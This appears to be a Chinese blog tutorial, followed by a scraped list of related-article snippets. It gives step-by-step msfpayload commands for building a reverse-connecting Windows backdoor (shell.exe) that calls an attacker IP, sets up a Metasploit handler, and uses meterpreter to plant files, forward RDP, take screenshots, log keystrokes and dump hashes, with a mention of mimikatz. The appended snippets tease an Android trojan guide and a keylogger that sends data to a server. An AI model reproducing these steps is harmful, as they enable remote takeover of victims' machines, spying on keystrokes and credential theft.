kali生成shell监听目标主机

生成监听用的shell.exe:

reverse_tcp(反向连接)

path : payload/windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

reverse_http/https(反向连接)

path:payload/windows/meterpreter/reverse_http/https

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。

bind_tcp(正向连接)

path : payload/windows/meterpreter/bind_tcp

正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。

利用shell.exe监听:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 8080

msf exploit(handler) > exploit -j

msf exploit(handler) >sessions

基本命令:

常用命令:

background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
Resource:执行一个已有的rc脚本。

写入文件夹:
meterpreter > pwd
meterpreter > cd C:\meterpreter > pwd
meterpreter > mkdir Hacked by AutoRoot
meterpreter > ls

写入内容:

edit + 文件,调用vi编辑。

网络相关:

网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)

meterpreter > portfwd
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2

在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了

 

键盘监听:

meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。

如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。

mimikatz:

抓取明文



时间: 2024-10-10 17:43:34

kali生成shell监听目标主机的相关文章

利用kali生成木马远程控制安卓手机

首先控制安卓手机,需要生成一个木马,生成后门 kali的IP地址:172.16.3.45 1.要达到远程控制安卓手机,你需要避开公网,所以在这里可以去买条隧道,我使用的是natapp里面的隧道 在natapp里面注册登录,可以去免费领取一条隧道,也可以去购买隧道,都很实惠的 2.获得隧道对应的IP地址以及端口号 首先配置隧道参数 ip地址选择你的kali的IP地址,本地端口尽量选择高位端口 下载natapp,打开 natapp -authtoken=**********   (********为

pyHook监听用户鼠标、键盘事件

一.代码部分:获取用户输入信息,并与截图一起保存到XX目录下 # -*- coding: utf-8 -*- # import pythoncom import pyHook    import time import socket from PIL import ImageGrab # #如果是远程监听某个目标电脑,可以自己架设一个服务器,然后将获取到的信息发回给服务器 # def send_msg_to_server(msg):     host=""     port=1234

redis绑定多个监听ip或者取消绑定

如果系统某个端口6379绑定监听ip127.0.0.1,则该端口只会通过来自这个ip的连接请求,拒绝非监听ip主机的连接. telnet 10.10.86.211 9000Trying 10.10.86.211...telnet: connect to address 10.10.86.211: Connection refused 另外一个原因:防火墙拦截.(只需要在被telnet服务器的firewall中放开相应主机ip,端口即可) 若为该端口绑定监听ip,而造成connection ref

Bootstrap的js插件之滚动监听

data-spy="scroll"--向您想要监听的元素(通常是 body)添加滚动监听事件 . data-target=".navbar"--指明导航条为监听目标: data-offset="70"--计算滚动位置时相对于顶部的偏移量(像素数); <!DOCTYPE html> <html lang="zh_CN"> <head> <meta charset="UTF-8&

16.4 配置Tomcat监听80端口;16.5、16.6、16.7配置Tomcat的虚拟主机(上中下);16.8 Tomcat日志

扩展: 邱李的tomcat文档 https://www.linuser.com/forum.php?mod=forumdisplay&fid=37 JAR.WAR包区别 http://blog.csdn.net/lishehe/article/details/41607725 tomcat常见配置汇总 http://blog.sina.com.cn/s/blog_4ab26bdd0100gwpk.html resin安装 http://fangniuwa.blog.51cto.com/10209

(转)oracle监听多台主机配置,用pl/sql连接操作多个数据库详解

很多朋友在开发项目中并不是每个人用一个数据库,而是有单独的一台主机作为开发的数据库服务器,这样,就需要我们的开发人员去连接他.         虽然网上有很多关于无需安装oracle 客户端,只需要进行特殊的配置即可能够对数据库进行操作,这里就不多说了,网上有很多关于这样的博文,我这里要说的是在已安装好oracle 客户端的机器上监听其他的数据库:         首先是进入oracle的 Net  Mananger: 接下来就是进行简单的设置了..         (1)点击此处的“+”号 :

16.4 配置Tomcat监听80端口 16.5/16.6/16.7 配置Tomcat虚拟主机 16.8 Tomcat日志

16.4 配置Tomcat监听80端口 16.5/16.6/16.7 配置Tomcat虚拟主机 16.8 Tomcat日志 扩展 邱李的tomcat文档 https://www.linuser.com/forum.php?mod=forumdisplay&fid=37 JAR.WAR包区别 http://blog.csdn.net/lishehe/article/details/41607725 tomcat常见配置汇总 http://blog.sina.com.cn/s/blog_4ab26b

Tomcat监听80端口、配置Tomcat虚拟主机、Tomcat日志

配置Tomcat监听80端口 1.配置Tomcat服务的访问端口 Tomcat默认启动的端口是8080,如果你想修改为80,则需要修改server.xml文件. [[email protected] src]# vim /usr/local/tomcat/conf/server.xml 按如下需求更改: 找到Connector port="8080" protocol="HTTP/1.1"修改为Connector port="80" protoc

配置Tomcat监听80端口, 配置Tomcat虚拟主机,Tomcat日志

配置Tomcat监听80端口 编辑配置文件vim /usr/local/tomcat/conf/server.xml在里面找到8080<Connector port="8080" protocol="HTTP/1.1"connectionTimeout="20000"redirectPort="8443" />将里面的8080改为80,然后保存退出.然后先关闭tomcat/usr/local/tomcat/bin/